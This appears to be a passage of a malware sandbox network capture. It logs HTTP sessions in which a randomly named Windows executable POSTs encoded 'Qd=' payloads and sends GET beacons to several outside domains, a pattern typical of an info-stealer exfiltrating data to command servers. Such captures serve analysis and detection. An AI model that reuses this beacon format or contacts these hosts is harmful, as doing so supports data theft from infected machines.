                        Sep 3, 2024 10:46:02.214585066 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Server: wts/1.7.0
                        Date: Tue, 03 Sep 2024 08:46:02 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Cache-Control: private
                        Content-Encoding: gzip
                        Strict-Transport-Security: max-age=31536000
                        Sep 3, 2024 10:46:02.214606047 CEST | 1217 | IN | Data Raw: (binary continuation of the gzip-encoded body; hex and ASCII dump omitted)


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        30 | 192.168.2.4 | 65008 | 218.247.68.184 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:03.816143990 CEST | 723 | OUT | POST /yzen/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.dfbio.net
                        Origin: http://www.dfbio.net
                        Referer: http://www.dfbio.net/yzen/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd=D/9dVfJYvq9GCD4GUCnUXy3EV3j076pifvjuSb/tcXuUjMhb+am0dpteeb1U1RAcFv6Wz+dgVnFo3Va8dqdqmoClEbiAT6D6kr+zEmkD4eYiOqdbi0y1SH7RJauW8Rw9blpRB8quKt35JdgsCpxYFkyTM5y3E6pCVM1i3y4n5z0M1RKXWLbKG9V4nfKAyN4IH2QeO/WHubETYmG1mvwrHS4=
                        Sep 3, 2024 10:46:04.760212898 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Server: wts/1.7.0
                        Date: Tue, 03 Sep 2024 08:46:04 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Cache-Control: private
                        Content-Encoding: gzip
                        Strict-Transport-Security: max-age=31536000
                        Sep 3, 2024 10:46:04.760230064 CEST | 224 | IN | Data Raw: (binary continuation of the gzip-encoded body; hex and ASCII dump omitted)
                        Sep 3, 2024 10:46:04.760240078 CEST | 993 | IN | Data Raw: (binary continuation of the gzip-encoded body; hex and ASCII dump omitted)


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        31 | 192.168.2.4 | 65009 | 218.247.68.184 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:06.358516932 CEST | 10805 | OUT | POST /yzen/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.dfbio.net
                        Origin: http://www.dfbio.net
                        Referer: http://www.dfbio.net/yzen/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd= [TRUNCATED]
                        Sep 3, 2024 10:46:07.584222078 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Server: wts/1.7.0
                        Date: Tue, 03 Sep 2024 08:46:07 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Cache-Control: private
                        Content-Encoding: gzip
                        Strict-Transport-Security: max-age=31536000


                        Session ID: 32 | Source IP: 192.168.2.4 | Source Port: 65010 | Destination IP: 218.247.68.184 | Destination Port: 80 | PID: 4908 | Process: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:08.910420895 CEST | 439 | OUT | GET /yzen/?Qd=O9V9WpJA2Id3CQ8eXizaOlP9WjrM4aluQNnrI8f3VjqE97lt7JSCdbE8JrYB0ARmCvuQ5PpqBCp66EiUa7dY6YydUJ+eQOaY3qqiNVkH5/URE6MIj12/bE0=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.dfbio.net
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:46:09.873079062 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                        Server: wts/1.7.0
                        Date: Tue, 03 Sep 2024 08:46:09 GMT
                        Content-Type: text/html; charset=utf-8
                        Transfer-Encoding: chunked
                        Connection: close
                        Vary: Accept-Encoding
                        Cache-Control: private
                        Strict-Transport-Security: max-age=31536000
                        Data Ascii: 12ff<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;
                        Sep 3, 2024 10:46:09.873096943 CEST | 1236 | IN | Data Ascii: color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdan
                        Sep 3, 2024 10:46:09.873106956 CEST | 1236 | IN | Data Ascii: code{color:#CC0000;font-weight:bold;font-style:italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class=
                        Sep 3, 2024 10:46:09.873119116 CEST | 1236 | IN | Data Ascii: "> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th></th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th></th><td>&nbsp;&nbsp;&nbsp;MapRequestHandler</td></tr> <tr class="alt"><th>
                        Sep 3, 2024 10:46:09.873128891 CEST | 193 | IN | Data Ascii: <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763"> &raquo;</a></p> </fieldset> </div> </div> </body> </html> 0


                        Session ID: 33 | Source IP: 192.168.2.4 | Source Port: 65011 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 4908 | Process: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:15.750397921 CEST | 733 | OUT | POST /cent/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.healthsolutions.top
                        Origin: http://www.healthsolutions.top
                        Referer: http://www.healthsolutions.top/cent/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd=o3Ct14AhdEmX4A722OJae8Uenjr4W7Npz+UpH1iNbp6wKp314mVDNN8atv9ROsMRE0LMB7UJuCo8bHnORL3stE0yyLDf34JT35dGxmKVIBHKEpz/QC1SGCSZHpwfljCSW+O1484jLHBwxmNS7bayYPuQyKyUS8O2kAA9ZD+VzoyJLdG7CojdXESZIWxjZOei9A==


                        Session ID: 34 | Source IP: 192.168.2.4 | Source Port: 65012 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 4908 | Process: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:18.400696993 CEST | 753 | OUT | POST /cent/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.healthsolutions.top
                        Origin: http://www.healthsolutions.top
                        Referer: http://www.healthsolutions.top/cent/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd=o3Ct14AhdEmX5hL26NhaZcURoDr4DLNtz+QpH1KdaaOwEr/17ihDYN8alP9UWMMPE0O5B/UJuDI8bCDORcbvsU0K5rDdpIJT35dGxmO/IBfKEZD/SnZRaySaEpwfvDDbW+PQ44ZrLEpwxm9S1qa1WPue8qzrbMHbmwFmGDf7s5/uKbXhTZCKFE2qVR4XUNjrmNYXSp69h7UDHB8CVxBlQg0=


                        Session ID: 35 | Source IP: 192.168.2.4 | Source Port: 65013 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 4908 | Process: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:20.992312908 CEST | 10835 | OUT | POST /cent/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.healthsolutions.top
                        Origin: http://www.healthsolutions.top
                        Referer: http://www.healthsolutions.top/cent/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd= [TRUNCATED]


                        Session ID: 36 | Source IP: 192.168.2.4 | Source Port: 65014 | Destination IP: 13.248.169.48 | Destination Port: 80 | PID: 4908 | Process: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:23.549416065 CEST | 449 | OUT | GET /cent/?0z=mDcdcR8&Qd=l1qN2MMhbl/x2ijL+cYxGoEcoDCmCINS+YU1HxWhb8Kqe535lkNGafx30NgxGLIJJEStArUmzXIrZ0bzKO7vv1M79bDO++JJrrxc/WvjehfCDuj8XmxnNRs= HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.healthsolutions.top
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:46:24.035274029 CEST | 389 | IN | HTTP/1.1 200 OK
                        Server: openresty
                        Date: Tue, 03 Sep 2024 08:46:23 GMT
                        Content-Type: text/html
                        Content-Length: 249
                        Connection: close
                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?0z=mDcdcR8&Qd=l1qN2MMhbl/x2ijL+cYxGoEcoDCmCINS+YU1HxWhb8Kqe535lkNGafx30NgxGLIJJEStArUmzXIrZ0bzKO7vv1M79bDO++JJrrxc/WvjehfCDuj8XmxnNRs="}</script></head></html>


                        Session ID: 37 | Source IP: 192.168.2.4 | Source Port: 65015 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 4908 | Process: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:37.280910969 CEST | 736 | OUT | POST /gxi9/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.golbasi-nakliyat.xyz
                        Origin: http://www.golbasi-nakliyat.xyz
                        Referer: http://www.golbasi-nakliyat.xyz/gxi9/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd=ZpdSaMkG9lHnAtF3DWI34aV4BivEUtsqJtR+11JjHq8BLe9aRhFGN8ooinsvZSk3wT51Wi4mqpxlqCJO7OVotqZ4f1NWnhROTjiQgoRlivU4RxGcj+mmAdGzwtLkesaNARPQWmN0IFjAT9XeixHZ8v4k700Hc4zsraeW6mtyA9LyCcJG99zCGRF8fl+1UrOMSQ==
                        Sep 3, 2024 10:46:37.934391975 CEST | 225 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Tue, 03 Sep 2024 08:46:37 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 19
                        X-Rate-Limit-Reset: 2024-09-03T08:46:42.8280947Z


                        Session ID: 38 | Source IP: 192.168.2.4 | Source Port: 65016 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 4908 | Process: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:39.831772089 CEST | 756 | OUT | POST /gxi9/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.golbasi-nakliyat.xyz
                        Origin: http://www.golbasi-nakliyat.xyz
                        Referer: http://www.golbasi-nakliyat.xyz/gxi9/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd=ZpdSaMkG9lHnANV3Qlg3/6V7LCvEeNsuJtd+10NzSIYBM65aQkpGM8ooqHsqdSkwwT0KWg8mqpNlqD5O7d9vt6Z6EFNU6RROTjiQgoUyivM4SBWcia6hI9G03tLkasaRARPyWk5SIGXAT4rehlTGyv4il01KcpyhnaOY+lFLCcjmDaYcsMSVURhPCi3BZozFJSjcm20ctrhrKZFsygipNYs=
                        Sep 3, 2024 10:46:40.500349998 CEST | 225 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Tue, 03 Sep 2024 08:46:40 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 18
                        X-Rate-Limit-Reset: 2024-09-03T08:46:42.8280947Z


                        Session ID: 39 | Source IP: 192.168.2.4 | Source Port: 65017 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 4908 | Process: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:42.378850937 CEST | 10838 | OUT | POST /gxi9/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.golbasi-nakliyat.xyz
                        Origin: http://www.golbasi-nakliyat.xyz
                        Referer: http://www.golbasi-nakliyat.xyz/gxi9/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd= [TRUNCATED]
                        Sep 3, 2024 10:46:43.036572933 CEST | 225 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Tue, 03 Sep 2024 08:46:42 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 19
                        X-Rate-Limit-Reset: 2024-09-03T08:46:47.9266839Z


                        Session ID: 40 | Source IP: 192.168.2.4 | Source Port: 65018 | Destination IP: 85.159.66.93 | Destination Port: 80 | PID: 4908 | Process: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:44.921449900 CEST | 450 | OUT | GET /gxi9/?Qd=Ur1yZ7cx/WDhKbJaAn0jkNNLDG3pddkDLNR9jSxILeo8Td4MSncFddMj031fez90w2sTSD8IzMd3myhBgMNGmZp5Mlx2w1QvKSGogY0wmO8HURKJraqBGaM=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.golbasi-nakliyat.xyz
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:46:45.583260059 CEST | 225 | IN | HTTP/1.1 404 Not Found
                        Server: nginx/1.14.1
                        Date: Tue, 03 Sep 2024 08:46:45 GMT
                        Content-Length: 0
                        Connection: close
                        X-Rate-Limit-Limit: 5s
                        X-Rate-Limit-Remaining: 19
                        X-Rate-Limit-Reset: 2024-09-03T08:46:50.4771474Z


                        Session ID: 41 | Source IP: 192.168.2.4 | Source Port: 65019 | Destination IP: 188.114.97.3 | Destination Port: 80 | PID: 4908 | Process: C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:50.765615940 CEST | 736 | OUT | POST /ibl4/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 199
                        Host: www.begumnasreenbano.com
                        Origin: http://www.begumnasreenbano.com
                        Referer: http://www.begumnasreenbano.com/ibl4/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd=Eqy6Erd1iyioEWLXavzQgnly16n/uTYRkqNB1jLbkzbE8MglGHRsv+AwXpa+e/kVgJ/BsKdnGF7Uv9AGfnVK2zkpSKEx5VDAZIMBgFnOBuqlK3mRY9xNfKVUGqVVzmDHcPKs3jNN+bHirPStqSd0x9gHmM5WTwMKIJBzzwI19T1sxznLHTULQ8HkPxjH9c5ZHQ==
                        Sep 3, 2024 10:46:51.843858957 CEST | 876 | IN | HTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:46:51 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U4Gpe5dCC8l71X39Vn26SsjVr%2Fz7flPj06hnbricMWfiq73qS58YOygl66D20AiJ%2FfQIIVq9x2tLxcUvCN72dhfrAP2cKbKuvcyodOachdSQNC88dEpQRDPGVvsqWcoU6zNkr7jQrFW2Lwg%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8bd478c1da5b42b7-EWR
                        Content-Encoding: gzip
                        alt-svc: h3=":443"; ma=86400
                        Sep 3, 2024 10:46:52.082355022 CEST | 876 | IN | HTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:46:51 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U4Gpe5dCC8l71X39Vn26SsjVr%2Fz7flPj06hnbricMWfiq73qS58YOygl66D20AiJ%2FfQIIVq9x2tLxcUvCN72dhfrAP2cKbKuvcyodOachdSQNC88dEpQRDPGVvsqWcoU6zNkr7jQrFW2Lwg%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8bd478c1da5b42b7-EWR
                        Content-Encoding: gzip
                        alt-svc: h3=":443"; ma=86400
                        Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        42 | 192.168.2.4 | 65020 | 188.114.97.3 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:53.322487116 CEST | 756 | OUT | POST /ibl4/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.begumnasreenbano.com
                        Origin: http://www.begumnasreenbano.com
                        Referer: http://www.begumnasreenbano.com/ibl4/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd=Eqy6Erd1iyioe27XJInQmHlxw6n/7DYNkqBB1i/yjBPE8tQlUV1su+AwDZa7QfkagIDzsIJnGFHUv4EGfWVV3jkvL6Ez9VDAZIMBgEDkBuylKDiRacxODaVTW6VV+GDccPL73h53+ebirPitpAki79gBiM4lVVxcIIopyBoQ4RBX5V2RWi1cC8jXS2qzwfEQcRS0tfvnvY37ZtAf+uckgh0=
                        Sep 3, 2024 10:46:54.222376108 CEST | 880 | IN | HTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:46:54 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c91hzZfyLQVvalF5d%2FNsVYmFDqNSsdwOqAxeUECQc5IbUfhh%2Bhmw9whbhXxgLvHTd9Ry4j0B0UoDC%2F7njtMFfosqovQuJ4UTf9dDeuNTdMt2yqx0B9%2F7t1d3DE1gLxKOCVQ8X0Q4FfS9Cl0%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8bd478d18c634211-EWR
                        Content-Encoding: gzip
                        alt-svc: h3=":443"; ma=86400
                        Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        43 | 192.168.2.4 | 65021 | 188.114.97.3 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:55.862021923 CEST | 10838 | OUT | POST /ibl4/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.begumnasreenbano.com
                        Origin: http://www.begumnasreenbano.com
                        Referer: http://www.begumnasreenbano.com/ibl4/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Ascii: Qd= [TRUNCATED]
                        Sep 3, 2024 10:46:56.812345982 CEST | 877 | IN | HTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:46:56 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        CF-Cache-Status: DYNAMIC
                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BTiToVapIr%2F1t2X2ecpH9c0h6KT95l0sLClWclHzwrcnWokq1JZh6aC%2F7hKTuuemiedquf1To6FfaDYQceFI5ENNFqAGy%2F2YUkjOBHdE8DT2E%2BK3QqVBHeL1HTSlghDhRFZ7Eovwwc78ZG4%3D"}],"group":"cf-nel","max_age":604800}
                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                        Server: cloudflare
                        CF-RAY: 8bd478e1a9634299-EWR
                        Content-Encoding: gzip
                        alt-svc: h3=":443"; ma=86400
                        Data Ascii: f5Tn0D)e%A U[l)JmovgV}WaMM3j;rrnrl.xiY/fl``BQ!au.q=wW!D!:N_.diRLycpb-CwPp3o(Y<;
                        Sep 3, 2024 10:46:56.812608004 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                        Data Ascii: 0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                        44 | 192.168.2.4 | 65022 | 188.114.97.3 | 80 | 4908 | C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        Timestamp | Bytes transferred | Direction | Data
                        Sep 3, 2024 10:46:58.401916027 CEST | 450 | OUT | GET /ibl4/?Qd=JoaaHegl6i+0bHLuLd264Bxd28Hb6zIn2a9w13HpkUvWqM8iIVBE+LpbDbn5e+5yif/ulpJxYQTtoLoBamVQ2AU3CZID6kvfd7ZL4Wu9CurbADaEbfhMIYo=&0z=mDcdcR8 HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Language: en-us
                        Connection: close
                        Host: www.begumnasreenbano.com
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Sep 3, 2024 10:46:59.348114014 CEST | 933 | IN | HTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:46:59 GMT
                        Content-Type: text/html; charset=iso-8859-1
                        Transfer-Encoding: chunked
                        Connection: close
                        CF-Cache-Status: DYNAMIC
